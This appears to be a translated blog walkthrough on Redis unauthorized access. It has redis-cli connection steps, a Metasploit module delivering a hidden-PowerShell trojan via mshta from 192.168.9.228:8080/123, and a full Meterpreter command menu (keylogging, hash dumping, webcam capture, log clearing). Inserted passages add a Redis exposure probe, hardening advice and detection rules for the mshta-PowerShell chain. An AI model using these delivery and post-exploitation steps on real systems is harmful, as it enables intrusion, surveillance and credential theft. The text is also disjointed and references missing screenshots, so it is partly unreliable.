Redis unauthorized access vulnerability (Windows system)
Download redis
yum install redis
or
apt-get install redis
Connect from the command line (redis listens on port 6379 by default)
redis-cli -h host -p port -a password
host: host of the remote redis server
port: port of the remote redis service
password: password of the remote redis service (if no password is set, the -a parameter is not needed)
Session download
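The connection step above is also the quickest way to audit your own servers: a Redis instance that answers PING without AUTH is exactly the "unauthorized access" this post is about. The following is an added example (not code from the original post) that speaks RESP, the Redis wire protocol, over a raw socket and classifies the server's first reply. The host and port passed to probe() are placeholders; the sample replies are constructed to match the three answers a real server gives.

```python
"""Check how a Redis instance answers an unauthenticated PING.

Added example (not code from the original post). It speaks RESP, the Redis
wire protocol, over a raw socket, so no redis client library is required.
The host and port in main() are placeholders for a server you administer.
"""
import socket


def encode_command(*args: str) -> bytes:
    """Encode a command as a RESP array of bulk strings.

    PING becomes b"*1\\r\\n$4\\r\\nPING\\r\\n", which is exactly what redis-cli sends.
    """
    parts = [f"*{len(args)}\r\n".encode()]
    for arg in args:
        raw = arg.encode()
        parts.append(f"${len(raw)}\r\n".encode() + raw + b"\r\n")
    return b"".join(parts)


def decode_reply(raw: bytes) -> tuple[str, str]:
    """Split the first RESP reply line into (type byte, payload).

    Only simple strings ('+') and errors ('-') matter here, because those are
    the two shapes a PING reply can take.
    """
    line, _, _ = raw.partition(b"\r\n")
    if not line:
        raise ValueError("empty reply")
    return chr(line[0]), line[1:].decode(errors="replace")


def classify(reply: bytes) -> str:
    """Map the server's reply to an exposure verdict."""
    kind, payload = decode_reply(reply)
    if kind == "+" and payload == "PONG":
        return "OPEN"            # command ran without AUTH: unauthenticated access
    if kind == "-" and payload.startswith("NOAUTH"):
        return "AUTH_REQUIRED"   # requirepass (or an ACL user password) is set
    if kind == "-" and payload.startswith("DENIED"):
        return "PROTECTED_MODE"  # Redis refused a non-loopback client
    return "UNKNOWN"


def probe(host: str, port: int = 6379, timeout: float = 3.0) -> str:
    """Send one PING over TCP and classify the answer."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(encode_command("PING"))
        return classify(sock.recv(4096))


# Constructed sample replies, modelled on the three answers a real server gives.
SAMPLE_REPLIES = {
    "no password configured": b"+PONG\r\n",
    "requirepass configured": b"-NOAUTH Authentication required.\r\n",
    "protected mode": b"-DENIED Redis is running in protected mode.\r\n",
}


if __name__ == "__main__":
    for label, reply in SAMPLE_REPLIES.items():
        print(f"{label:24s} -> {classify(reply)}")
    # probe("127.0.0.1")  # placeholder host; run it only against a server you own
```

A verdict of OPEN means the instance accepts commands from anyone who can reach the port, which is what the rest of this post relies on. The fix is in redis.conf: set `requirepass`, keep `bind 127.0.0.1` unless the service really must be reachable remotely, leave `protected-mode yes`, and consider `rename-command CONFIG ""` so that a client cannot rewrite `dir` and `dbfilename` to drop files on disk.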
The msf rb script directory; then copy the downloaded rb script into the msf script directory
After entering msf, reload the modules
use
set uripath
exploit (here it waits for the client to execute "192.168.9.228:8080/123")
When it ran, Tencent PC Manager flagged it as malicious; what happens here is that the mshta tool downloads the "123" trojan file from the remote server.
After restoring the trojan and viewing its source, shown below, it turns out to be a trojan that runs PowerShell as a hidden process.
PowerShell process list
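The loader chain described above (mshta.exe pulling a remote file, then a PowerShell process with a hidden window) is visible in process-creation telemetry, which is where a defender would catch it. The following is an added example, not part of the original post: three rules run over events constructed in the shape of Sysmon Event ID 1 (Image, ParentImage, CommandLine). The URL is the one quoted in the post; every other path and command line is a sample value, not captured telemetry.

```python
"""Flag process-creation events that match the loader pattern described above:
mshta.exe fetching a remote URL, then a hidden PowerShell child process.

Added example, not part of the original post. Events are constructed in the
shape of Sysmon Event ID 1 (Image, ParentImage, CommandLine); the command
lines and paths are sample values, not captured telemetry.
"""
import re

# powershell.exe accepts any unambiguous prefix of -WindowStyle Hidden
# (e.g. "-w hidden", "-win hid"), so the pattern matches the prefixes too.
HIDDEN_WINDOW = re.compile(r"-w[a-z]*\s+hid[a-z]*", re.IGNORECASE)
REMOTE_URL = re.compile(r"https?://\S+", re.IGNORECASE)


def basename(path: str) -> str:
    """Last component of a Windows path, lower-cased for comparison."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: dict) -> list[str]:
    """Return the name of every rule the event trips (empty list if clean)."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")
    hits = []
    if image == "mshta.exe" and REMOTE_URL.search(cmdline):
        hits.append("mshta fetching remote content")
    if image == "powershell.exe" and parent == "mshta.exe":
        hits.append("powershell spawned by mshta")
    if image == "powershell.exe" and HIDDEN_WINDOW.search(cmdline):
        hits.append("hidden powershell window")
    return hits


def scan(events: list[dict]) -> list[tuple[int, str]]:
    """Run every rule over every event; returns (event index, rule name) pairs."""
    return [(i, rule) for i, ev in enumerate(events) for rule in evaluate(ev)]


# Constructed sample events. The URL is the one quoted in the post; the rest is invented.
EVENTS = [
    {
        "Image": r"C:\Windows\System32\mshta.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "mshta.exe http://192.168.9.228:8080/123",
    },
    {
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\mshta.exe",
        "CommandLine": 'powershell.exe -NoProfile -w hidden -Command "Start-Sleep 1"',
    },
    {   # benign: interactive PowerShell started by the user from Explorer
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "powershell.exe Get-Process",
    },
]


if __name__ == "__main__":
    for index, rule in scan(EVENTS):
        print(f"event {index}: {rule}")
```

The parent/child rule is the strongest of the three: mshta.exe has almost no legitimate reason to start PowerShell, whereas a hidden window alone also appears in scheduled tasks and login scripts, so that rule is better used to raise the score of an alert than to fire on its own.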
The session as seen on the server side
sessions 2 enters that session; then run sysinfo
The commands that can be executed are:
meterpreter > ?
Core Commands
=============
Command                  Description
-------                  -----------
?                        Help menu
background                Backgrounds the current session
bg                        Alias for background
bgkill                    Kills a background meterpreter script
bglist                    Lists running background scripts
bgrun                    Executes a meterpreter script as a background thread
channel                  Displays information or control active channels
close                    Closes a channel
disable_unicode_encoding  Disables encoding of unicode strings
enable_unicode_encoding  Enables encoding of unicode strings
exit                      Terminate the meterpreter session
get_timeouts              Get the current session timeout values
guid                      Get the session GUID
help                      Help menu
info                      Displays information about a Post module
irb                      Open an interactive Ruby shell on the current session
load                      Load one or more meterpreter extensions
machine_id                Get the MSF ID of the machine attached to the session
migrate                   Migrate the server to another process
pivot                    Manage pivot listeners
pry                      Open the Pry debugger on the current session
quit                      Terminate the meterpreter session
read                      Reads data from a channel
resource                  Run the commands stored in a file
run                      Executes a meterpreter script or Post module
secure                    (Re)Negotiate TLV packet encryption on the session
sessions                  Quickly switch to another session
set_timeouts              Set the current session timeout values
sleep                     Force Meterpreter to go quiet, then re-establish session.
transport                 Change the current transport mechanism
use                       Deprecated alias for "load"
uuid                      Get the UUID for the current session
write                    Writes data to a channel
Stdapi: File system Commands
============================
Command      Description
-------      -----------
cat          Read the contents of a file to the screen
cd            Change directory
checksum      Retrieve the checksum of a file
cp            Copy source to destination
del          Delete the specified file
dir          List files (alias for ls)
download      Download a file or directory
edit          Edit a file
getlwd        Print local working directory
getwd        Print working directory
lcd          Change local working directory
lls          List local files
lpwd          Print local working directory
ls            List files
mkdir        Make directory
mv            Move source to destination
pwd          Print working directory
rm            Delete the specified file
rmdir        Remove directory
search        Search for files
show_mount    List all mount points/logical drives
upload        Upload a file or directory
Stdapi: Networking Commands
===========================
Command      Description
-------      -----------
arp          Display the host ARP cache
getproxy      Display the current proxy configuration
ifconfig      Display interfaces
ipconfig      Display interfaces
netstat      Display the network connections
portfwd      Forward a local port to a remote service
resolve      Resolve a set of host names on the target
route        View and modify the routing table
Stdapi: System Commands
=======================
Command      Description
-------      -----------
clearev      Clear the event log
drop_token    Relinquishes any active impersonation token.
execute      Execute a command
getenv        Get one or more environment variable values
getpid        Get the current process identifier
getprivs      Attempt to enable all privileges available to the current process
getsid        Get the SID of the user that the server is running as
getuid        Get the user that the server is running as
kill          Terminate a process
localtime    Displays the target system local date and time
pgrep        Filter processes by name
pkill        Terminate processes by name
ps            List running processes
reboot        Reboots the remote computer
reg          Modify and interact with the remote registry
rev2self      Calls RevertToSelf() on the remote machine
shell        Drop into a system command shell
shutdown      Shuts down the remote computer
steal_token   Attempts to steal an impersonation token from the target process
suspend       Suspends or resumes a list of processes
sysinfo       Gets information about the remote system, such as OS
Stdapi: User interface Commands
===============================
Command        Description
-------        -----------
enumdesktops  List all accessible desktops and window stations
getdesktop    Get the current meterpreter desktop
idletime      Returns the number of seconds the remote user has been idle
keyboard_send  Send keystrokes
keyevent      Send key events
keyscan_dump  Dump the keystroke buffer
keyscan_start  Start capturing keystrokes
keyscan_stop  Stop capturing keystrokes
mouse          Send mouse events
screenshare    Watch the remote user desktop in real time
screenshot    Grab a screenshot of the interactive desktop
setdesktop    Change the meterpreters current desktop
uictl          Control some of the user interface components
Stdapi: Webcam Commands
=======================
Command        Description
-------        -----------
record_mic    Record audio from the default microphone for X seconds
webcam_chat    Start a video chat
webcam_list    List webcams
webcam_snap    Take a snapshot from the specified webcam
webcam_stream  Play a video stream from the specified webcam
Stdapi: Audio Output Commands
=============================
Command      Description
-------      -----------
play          play a waveform audio file (.wav) on the target system
Priv: Elevate Commands
======================
Command      Description
-------      -----------
getsystem    Attempt to elevate your privilege to that of local system.
Priv: Password database Commands
================================
Command      Description
-------      -----------
hashdump      Dumps the contents of the SAM database
Priv: Timestomp Commands
========================
Command      Description
-------      -----------
timestomp    Manipulate file MACE attributes
meterpreter >
Screenshots of some of the commands; some of them could not be executed
After the server side exits, the client automatically closes the PowerShell process
